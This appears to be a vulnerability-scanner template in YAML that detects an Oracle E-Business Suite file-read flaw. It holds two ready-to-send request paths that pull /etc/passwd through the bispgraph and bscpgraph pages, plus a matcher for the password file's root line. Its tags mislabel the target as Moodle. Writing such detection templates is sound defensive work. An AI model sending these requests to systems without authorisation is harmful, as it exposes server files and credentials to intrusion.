19 lines
439 B
YAML
19 lines
439 B
YAML
id: oracle-ebs-bispgrapgh-file-read
|
|
|
|
info:
|
|
name: Oracle EBS Bispgraph File Access
|
|
author: emenalf & tirtha_mandal
|
|
severity: critical
|
|
tags: moodle,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/"
|
|
- "{{BaseURL}}/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd"
|
|
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
part: body |